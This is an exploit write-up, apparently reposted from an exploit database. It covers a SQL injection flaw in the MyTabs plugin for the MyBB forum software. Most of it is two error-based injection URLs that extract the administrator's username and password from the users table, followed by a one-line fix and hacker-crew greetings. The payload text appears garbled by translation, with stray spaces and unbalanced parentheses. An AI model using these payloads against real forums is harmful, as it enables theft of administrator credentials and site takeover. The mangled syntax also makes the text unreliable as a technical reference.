# Exploit title: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR. SQL
# Vulnerable Software Link: http://mods.mybb.com/view/mytabs
Vulnerability:
$ ~ Http://www.bkjia.com/mybbpath/index. php? Tab = [SQLi]
---------------------------------------
#~ Expl0itation ~ #
---------------------------------------
$ ~ Get the administrator's username (usually it has uid = 1 )~
Http://www.bkjia.com/mybbpath/index. php? Tab = 1' and (select 1 from (select count (*), concat (select username from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B )---
$ ~ Get the administrator's password ~
Http://www.bkjia.com/mybbpath/index. php? Tab = 1' and (select 1 from (select count (*), concat (select password from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B )---
_________________
Fix: filter the tab parameters on the index. php page.
# Greetz: Programer, Dr. moka, eragon, BaDBoY-AL, z3r0w1zard, Red Dragon_aL, Pretorian, Th3_Power, R-t33n, Ace Wizard, KubaNnez1, ssgodfather, DJDukli, b4ti, CroSs HackForums. AL members & All our friends.